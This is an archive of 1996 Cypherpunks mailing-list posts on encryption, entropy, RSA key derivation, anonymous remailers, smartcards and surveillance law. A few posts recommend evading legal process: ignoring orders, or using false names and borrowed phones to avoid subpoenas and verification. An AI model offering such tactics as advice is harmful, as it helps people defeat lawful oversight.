U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 22 Apr 1996 16:12:09 +0800
To: mirele@xmission.com
Subject: Re: OS/2 encryption
Message-ID: <199604220501.WAA05264@dfw-ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:53 AM 4/21/96, mirele@xmission.com wrote:
>Well, anything to slow them down.  It was reported to me that when Dennis
>Erlich was raided last year, they rendered his computer unbootable because
>of the deletions they had made.  As it is, I haven't been able to find an
>appropriate security utility beyond PGP (which I've been using for over a
>year anyway).  So this discussion is moot.

Good luck finding something.  You might want to see if there's a Norton
version for OS/2; their Diskrete product for DOS may not be the highest
quality system in the world but at least it's a start, and maybe they do OS/2.

There are two ways the Bad Guys can get your system, or the data off it -
they can get a search/seizure warrant, or they can subpoena it into court,
and you have a lot more control over the process with a subpoena,
though the court may be able to compel production of your password
(that's debatable, and it's been much debated here and on Cyberia-L,
but a search or seizure warrant _can't_ get your password if it's not
written down.)
Therefore, if they do a seizure, and your file system is encrypted,
the Bad Guys can trash the whole thing, or random blocks, but without
the password they can't selectively delete data, and trashing the
whole thing could look _real_ bad for them in court.

>Look folks.  *This* is what it's about.  I like a little humour.  So what
>I've been doing is taking *posted* documents and running them through a
>filter (the "encheferizer" of alt.swedish.chef.bork.bork.bork) and then
>reposting them to alt.religion.scientology.  I have been doing this for
>over a year.  It's only been recently that (a) the Church <spit> started
>cancelling them and (b) that they started threatening me over it.  

Parodies are legal, but translations may still violate copyright, and
essentially you're doing an automated translation into some bizarre language
space.
So if you're using real* CoS documents, you may have a problem.
        [* Yeah, I know, "real CoS documents" is a bit of an oxymoron. ]
Does the Chef do Clam Chowder?
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 22 Apr 1996 16:04:28 +0800
To: cypherpunks@toad.com
Subject: Re: Add-in encryption module to Netscape
Message-ID: <199604220502.WAA05299@dfw-ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:55 PM 4/20/96 -0700, frantz@netcom.com (Bill Frantz) wrote:
>I have thought about the sources of entropy available to a Java applet, and
>there aren't many.  You should design your protocol so entropy is not
>needed on the applet side.  Entropy is normally used to pick symmetric
>encryption keys, and Initialization vectors

If your applet wants to set up a Diffie-Hellman connection, it'll need
a random number to set its half-key; a scribble window may be good enough.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Mon, 22 Apr 1996 15:58:52 +0800
To: "cypherpunks@toad.com>
Subject: RE: Betting  (Re: [Yadda Yadda Yadda]....)
Message-ID: <01BB2FCE.B8DD4D20@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, I don't know about Sandy or Tim, but I found the rants between Jim & Uni somewhat amusing (although I myself only skimmed through them) because for every huff&puff which transpired between them, Uni was prompted to dig up more info from the depths of his knowledge, and this effect was quite interesting, psychologically, as well as in regard of the info which came out of it.   

I expect Jim & Uni could become great friends!  (giggle)

     ..
Blanc









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 22 Apr 1996 16:34:11 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Betting (Re: [Yadda Yadda Yadda]....)
In-Reply-To: <ada040ff090210048622@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960421220732.1273D-100000@crl13.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks:

On Sun, 21 Apr 1996, Timothy C. May wrote:

> By the way, my hunch is that virtually none of us know very well what Bell
> and Uni are saying to each other, so who would possibly agree to be the
> judge? MAYBE SANDY, YOU WILL VOLUNTEER. Let us know how it turns out, if it > turns out and $100 actually changes hands.
[emphasis added]

I'd be happy to help resolve any wager of this sort that arises
on the Cypherpunks list.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 23 Apr 1996 06:08:45 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Nazis on the Net
Message-ID: <199604220217.WAA14740@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Apr 21, 1996 17:23:00, '"E. ALLEN SMITH"
<EALLENSMITH@ocelot.Rutgers.EDU>' wrote: 
 
 
>	In view of the Zundelsite business, I thought people might find the 
>following of interest. Unfortunately, the author is either leaving 
>some critical information out or is misinformed. Specifically, the actual 
>history on the Zundelsite business, and the actual circumstances at Ruby
Ridge;  
> 
>on the latter, Randy Weaver was neither a neo-Nazi nor a racist. He was
(and, 
>so far as I know, still is) a white separatist. (One would think liberals 

>would 
>tolerate this - they tolerate the equally offensive black separatists,
after 
>all...). The Zundelsite reference is incomplete in that it fails to
describe 
>the motivations of the mirrorsites. 
>	-Allen 
 
Since E.A. Smith wants completeness re the Zundelsite issue, I am curious
about his assertion about Weaver. 
 
Might we know the source of his complete info on Weaver's political and
racial beliefs. 
 
I see, in essence, three hypothesis: 
 
1) Cover the ass of a potential neo-Nazi or racist (or both) without any
reference to what is really true; 
 
2) Get information from outer space; 
 
3) Base the conclusion on hard evidence. 
 
If the answer is 3) I'd like to get a real pointer to the real evidence. By
real evidence I mean just that, not wishful thinking or advertising jingles
for points 1) or 2). 
 
--tallpaul 
 
PS: Cypherpunks seems to be getting very wiggy these days.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CS5549@conrad.appstate.edu
Date: Mon, 22 Apr 1996 13:08:32 +0800
To: CYPHERPUNKS@toad.com
Subject: privacy
Message-ID: <01I3TIRPO54GBIJ7TQ@conrad.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


Send me info....soon!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Mon, 22 Apr 1996 14:06:01 +0800
To: coderpunks@toad.com
Subject: A better entropy estimation method for random.c/noise.sys?
Message-ID: <199604220324.XAA09211@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



I've been hacking with the hashing method used in noise.sys and 
decided to throw it away, since it did more to overestimate the 
entropy.

Until I find something better an xor-checksum of the ast N samples 
seems to do fine. Alternating samples generate no entropy and samples 
with periods <= N seem to generate less than 1 bit per sample.

The method (in pseudo-code) is as follows:

  delta = abs( LastSample - sample )
  LastSample = sample

  hash ^= delta  /* until I can think of a better hashing algorithm */
  swap delta, lastNtable[ indexNtable ]
  indexNtable = (indexNtable+1) mod N
  hash ^= delta

  t = counter /* counts the number of samples so far */
  counter++
  swap t, lastseen[ hash & (TABLESIZE-1) ]
  diff = lastseen[ hash & (TABLESIZE-1) ] - t

  if diff<=N, assume no entropy (or fractional entropy?)
  otherwise return log2(diff)


Comments?
Rob. 

---
Send a blank message with the subject "send pgp-key"
to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 22 Apr 1996 20:12:46 +0800
To: cypherpunks@toad.com
Subject: Re: java security
Message-ID: <199604220633.XAA07953@dfw-ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:24 PM 4/21/96 -0700, Lucky Green wrote:
>>A couple of glitches I've gotten from Javascripts are poorly
>>(purposely?) written applets that crash. One kept printing a modal
>>dialog box continuously, the result being a need to reboot the
>>computer because there was no way to exit Netscape or Windows.
>
>I can confirm this. Under Win95, I have seen applets that keep running
>after the browswer instance that loaded has been closed. Even run over
>other applications windows, leaving aninmated artifacts on the screen.
>Sometimes only the power switch will do. I thought that the applets weren't
>supposed to be able to wander out of their memory space...

Were they Java, or JavaScript?  Much different.  Among other things,
JavaScript runs on Win3.1, and Netscape doesn't let you turn it off.
I've had at least one event of JavaScript crashing Netscape; the part
of the script I noticed was scrolling lots of stuff along the bottom
(Hail Eris!  All Hail Discordia!  Etc. Etc.) but maybe there was more.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 22 Apr 1996 18:08:51 +0800
To: cypherpunks@toad.com
Subject: Re: Memorized secret keys
Message-ID: <199604220655.XAA10327@dfw-ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:16 PM 4/19/96 -0700, Hal <hfinney@shell.portal.com> wrote:
>Choose x bits of good random numbers (x defined below), calling it X.
>Seed an MD5 iteration or some other crypto RNG with X and generate
>random starting points for p and q.  Search for the next primes after
>these starting points to get p and q, multiply to get n, and choose the
>first exponent >= 3 or 17 or 65537 (choose by taste) as e.  Burn p and
>q but memorize the random seed X.

An interesting approach; given enough spare computing, the passphrase
is the key.  Remember to transform the passphrase space into some
wide-enough space that it will include a bunch of primes, to avoid
having multiple passphrases generating the same prime.  Primes density
is approximately log n (ln n?), e.g. 1/512 for a 512-bit number,
so a crude approach like using a 128-bit hash as the most significant bits
should do fine.

>The main question is, can x be both long enough that it is not the
>weakest length in factoring, say, a 1024 bit key, while being short
>enough that it can be memorized?
>My guess is that x must be 80-120 bits, somewhere in there.  This would
>be 6 to 9 words chosen from a 16K word list: marginaly doable. 

Almost by definition, you want at least 128 bits, since you'll probably be
using the public key crypto to protect a 128-bit session key.  (Keys for
signatures may need a bit less slack, though I'd still be wary of <90 bits.)
Also, if you're starting by taking an MD5 of the passphrase (after looking up
the words in the dictionary or whatever), you're limited to 128 bits of
entropy; it's probably worth using SHA, or at least picking p from the MD5
and q from the MD5 of the reverse of the passphrase.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 22 Apr 1996 17:59:35 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Smartcards are coming to the US
In-Reply-To: <2.2.32.19960422024309.00a7ef74@mail.teleport.com>
Message-ID: <Pine.SUN.3.91.960422002225.9131V-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Apr 1996, Alan Olsen wrote:

> At 03:15 PM 4/21/96 -0400, Brad Dolan wrote:
> >Saw a CNN story Friday about an interesting special debit card 
> >application in Mexico.  They're being issued to poor Mexicans, who can 
> >use them to buy tortillas and a few other foodstuffs.  The cards are tied to 
> >a behavior-control database and failure to send kids to school, get 
> >mandatory medical exams/treatments/vaccinations, etc. results in card 
> >deactivation.
> 
> Interesting method of social control.  "Do anything we don't like and we
> revoke your ability to spend money through government approved outlets."

Just the next logical extension of removing professional licenses for 
failure to comply with government edicts, removing driving licenses for 
failure to pay government imposed fines.

See Reich, "The New Property" and "The New Property after 25 Years"  
(Harvard Law Review I believe).  He suggests constitutional protections 
for these and other entitlements (like welfare), including due process.  
An entitlement to entitlements so to speak.  I believe that the better 
solution is to protect the rights ex ante (anonymous drivers/age and 
entitlement credentials) rather than ex post through the constitution 
but he has a very interesting survey of the various largess that 
government withholds to get its way.

> 
> What a Brave New World we live in...
> ---
> Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
>         `finger -l alano@teleport.com` for PGP 2.6.2 key 
>                 http://www.teleport.com/~alano/ 
>   "We had to destroy the Internet in order to save it." - Sen. Exon

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 22 Apr 1996 18:32:58 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Add-in encryption module to Netscape
Message-ID: <199604220748.AAA17997@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 PM 4/21/96 -0700, Bill Stewart wrote:
>At 09:55 PM 4/20/96 -0700, frantz@netcom.com (Bill Frantz) wrote:
>>I have thought about the sources of entropy available to a Java applet, and
>>there aren't many.  You should design your protocol so entropy is not
>>needed on the applet side.  Entropy is normally used to pick symmetric
>>encryption keys, and Initialization vectors
>
>If your applet wants to set up a Diffie-Hellman connection, it'll need
>a random number to set its half-key; a scribble window may be good enough.

Indeed, Bill Stewart (and someone else whose name I forget) are right.  I
had it in the back of my head that you don't want to harass the user.  If
you are willing, as in PGP, to ask the user to enter some entropy, then
there you can get some sources of randomness which may be good enough. 
However, do be conservative.  After being conservative, gather 10 times as
much as you thought you needed.  The models of entropy in scribbling are
none too good.


Regards - Bill



------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 22 Apr 1996 16:27:05 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Betting  (Re: [Yadda Yadda Yadda]....)
In-Reply-To: <ada040ff090210048622@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960422011612.26348A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 21 Apr 1996, Timothy C. May wrote:

> it never got realized...precisely the desired result of absurdly large
> bets. I'll bet $10,000 that no bet of $10,000 or more ever actually gets
> settled on this list.

Were Mr. May not kidding, (I assume he is) I'd settle with Mr. Bell for
$10,000 and have Mr. May pay the debt with his losing wager above.  Of
course, in the best of all worlds, Mr. Bell and I would split the result.

:)

> --Tim May

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Mon, 22 Apr 1996 18:44:14 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Smartcards are coming to the US
In-Reply-To: <2.2.32.19960422024309.00a7ef74@mail.teleport.com>
Message-ID: <Pine.SUN.3.91.960422025540.16240A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 21 Apr 1996, Alan Olsen wrote:

> At 03:15 PM 4/21/96 -0400, Brad Dolan wrote:
> >Saw a CNN story Friday about an interesting special debit card 
> >application in Mexico.  They're being issued to poor Mexicans, who can 
> >use them to buy tortillas and a few other foodstuffs.  The cards are tied to 
> >a behavior-control database and failure to send kids to school, get 
> >mandatory medical exams/treatments/vaccinations, etc. results in card 
> >deactivation.
> 
> Interesting method of social control.  "Do anything we don't like and we
> revoke your ability to spend money through government approved outlets."
> 
> What a Brave New World we live in...

I had read it rather differently: "Do what we want and we'll give you 
food and maybe some other essentials."

One can argue about the government's right to do this, the source of the 
money, etc. But if private charity or industry had chosen to do this, 
we'd probably look on it rather differently.

It's still scary, though; sometimes smart cards are too smart.

Jon Lasser
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tjava.com (Anonymous)
Date: Mon, 22 Apr 1996 22:51:22 +0800
To: cypherpunks@toad.com
Subject: Re: Bad news from Judge Richey
Message-ID: <199604221100.GAA05024@tjava.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 PM 3/25/96 tcmay wrote:
-------------------

jim bell: >talk to Jim Bell about implementing a program using 
encryption that doesn't
>_need_ to be exported...legally anyway.


tcmay: You're coming perilously close to actually calling for 
the killing of a  federal judge. My recollection is that a 
couple of folks have been arrested  and charged for calling for 
the killing of judges.

-------------------


Any half-wit falling for agent provocateur Bell's rap will do 
hard time, or maybe get popped "in self-defense" by his TLA 
watchers.


The son-of-a-bitch's baiting pigeon traps, no question. He's 
too myopic to see how he's luring falcons for attack by 
high-circling eagles. Bell's going down blind-sided with his 
gulls.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 22 Apr 1996 22:10:24 +0800
To: cypherpunks@toad.com
Subject: Re: Was the clause for Biometric ID Cards dropped?
Message-ID: <2.2.32.19960422103441.00cee464@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:20 PM 4/21/96 -0700, Lucky Green wrote:
>At 17:12 4/21/96, E. ALLEN SMITH wrote:
>>        As the subject line says, was the proposal for Biometric ID Cards
>>dropped? I saw something about it on here and forwarded it; my respondent
>>(Phil Agre of the RRE news service) says he thought that clause had been
>>dropped.
>
>If it passes this year, next year, or five years from now, pass it will.
>With the customary >90%. Presumably after a suitable Reichstag Brand.

But since they are unlikely to imprison you for not having them.  And you
will be able to be self employed and drive cars (with foreign or no
licenses) and everything without them.  What good are they?

DCF

"Note to commentators about little Jessica's tragic crash.  It *is* legal
for 7 year olds to drive cars as long as they don't do so on the public
streets and highways."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 22 Apr 1996 21:42:33 +0800
To: Jim Byrd <cypherpunks@toad.com
Subject: Re: CoS and anon remailers
Message-ID: <2.2.32.19960422103718.00ce7260@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:49 PM 4/10/96 -0400, Jim Byrd wrote:
>My feeling is that they will be doing anything they can
>to attempt to produce "hard evidence" that I am part of
>the Grand Conspiracy. I would say it is virtually certain
>that U.S. anon remailers will be subpoenaed as well as any
>foreign ones in which they can handle the authorities.

Isn't it a bit difficult to subpeona an anonymous remailer?  

If run on a large enough system, a remailer can be shut down but not siezed.
(I can imagine the marshalls hauling off the Cal Tech mainframes.)

If a remailer operator has an accomodation address and/or a false name
effective service of process also becomes difficult.  

Usually in life I've noticed that if you just ignore stuff it goes away.
Occaisionally you will be hassled but if you ignore many of the orders of
others for your whole life, you will find that your net amount of what we
might call "autonomous activity" will be greater than if you slavishly obey
every order.

DCF 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 22 Apr 1996 21:41:03 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Anonymnity at teleport
Message-ID: <2.2.32.19960422104035.0068ee58@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



>>>Our users can have a P.O. Box as their address (or a false address),
>>>whatever they want as their 'real name', and can pay for their accounts by
>>>mailing in cash. All they need to do is be close to a phone that isn't
>>>theirs for an hour or so.
>>
>>>The can put in a phone# when they set up, then call in from that phone (even
>>>if it isn't their own) and have one of us call them back with a few
>>>minutes...all set.

Of course, you can also do this with CompuServe or any service that uses
phone verification.  I opened my CompuServe account in my True Name but with
the phone number of one of my mail receiving services.  They wanted a
similar callback scheme as above.  I went to my mail receiving service,
called the CIS 800 number and they called me right back.  I was friendly
with my mail services so had no trouble.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 23 Apr 1996 02:38:37 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199604221350.GAA03507@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@gate.net> mix cpunk latent";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 22 Apr 96 6:46:30 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
exon     remailer@remailer.nl.com         ++****+****#     3:56  99.98%
shinobi  remailer@shinobi.alias.net       +*#-+-*+*--*  1:21:52  99.97%
alpha    alias@alpha.c2.org               + *+*+++-*++    44:07  99.88%
portal   hfinney@shell.portal.com         ###*#-# *###     2:35  99.80%
hacktic  remailer@utopia.hacktic.nl       *+* +*****+*     9:33  99.73%
amnesia  amnesia@chardos.connix.com       -+---+-----   2:41:12  99.60%
treehole remailer@mockingbird.alias.net   --+-+ --.--+  5:09:41  99.40%
alumni   hal@alumni.caltech.edu            ## * * *###     3:58  99.38%
replay   remailer@replay.com              *+*   ******     6:37  99.36%
extropia remail@miron.vip.best.com        --- --.----   6:42:44  99.09%
haystack haystack@holy.cow.net            #*#++#*#*#++     4:30  99.08%
lead     mix@zifi.genetics.utah.edu       ++++++++++++    42:08  98.55%
c2       remail@c2.org                    ++++++ +-***    36:14  98.49%
ecafe    cpunk@remail.ecafe.org           *+---+*-#*+     22:24  98.25%
flame    remailer@flame.alias.net         ---  _.-----  7:26:44  97.13%
penet    anon@anon.penet.fi               -__...__ --  32:56:37  96.98%
vegas    remailer@vegas.gateway.com       +*##*+*+      1:03:31  57.66%
ncognito ncognito@gate.net                 *##              :58  24.27%
mix      mixmaster@remail.obscura.com     ----+         2:24:40  22.82%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Mon, 22 Apr 1996 16:22:06 +0800
To: Bruce Marshall <cypherpunks@toad.com
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
Message-ID: <2.2.32.19960422062019.00386aec@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 09:08 1996-04-16 -0500, Bruce Marshall wrote:
>On Mon, 15 Apr 1996, Vladimir Z. Nuri wrote:
>> I have been wondering about malicious hackers getting into these
>> pools. would it be possible for them to contribute false data
>> that screws up the end results? or are such anomalies easily
>> discarded or disregarded by the final processes?
>
>    I guess I would have to ask you why you think hackers would be 
>interested in these projects in the first place?  Your typical hacker 
>would care very little about such a project and in fact may be interested 
>in seeing it succeed.  

The hacker might be a Netscape shareholder. A successful cracking of ssl
means that his shares lose value.

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Marshall <brucem@wichita.fn.net>
Date: Tue, 23 Apr 1996 02:10:12 +0800
To: cypherpunks@toad.com
Subject: Re: Wiretapping v warrants
In-Reply-To: <m0uAhuj-00090KC@pacifier.com>
Message-ID: <Pine.BSI.3.91.960422082951.14906A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Apr 1996, jim bell wrote:

> At 10:42 AM 4/20/96 -0500, Bruce Marshall wrote:
> >On Fri, 19 Apr 1996, jim bell wrote:
> >
> >> Here's a question, however:  What, exactly, stands between the way it is 
> >> supposedly done, today, and wiretapping with none of these "protections."
> >
> >    First and foremost Congress,
> 
> But were these "protections" the product of a law passed by Congress?

    As I do not qualify as a legal historian or expert I don't have any 
definitive answer for you on this point.  My guess would be that it lies 
somewhere in the bowels of the legal system.  I recall hearing about some 
early cases involving operators listening in on telephone calls (which I 
believe they are still able to do as long as it is random and for 
purposes of "service checks") and how this was declared a violation of 
privacy to the calling parties.

> > then the Judicial system 
> 
> I'm feeling much better....NOT!

    Obviously not a flawless and perfect branch of government, but what is?

> >and finally the people themselves.
> 
> It's called "Right to Keep and Bear Arms."

    More likely, the "Right to Vote Out the Incumbents."

> >    Since I'm not exactly sure whether the targets of a wiretap are ever 
> >informed that their conversations were monitored if they aren't later 
> >prosecuted using the info gained through the wiretap, I couldn't really 
> >comment on why if that is the case. 
> 
> The reason you don't know is simply that there is no _Constitutional_ 
> reason.  There is merely a practical one:  The act of wiretapping does not 
> automatically inform those tapped, in the same way that service of a search 
> warrant does, so the government CONVEEEENIENTLY forgets to tell them.  Most 
> government suck-ups don't even want to address this issue; they have no 
> explanation.  Unlike them, you acknowledged that you weren't away of the reason why.

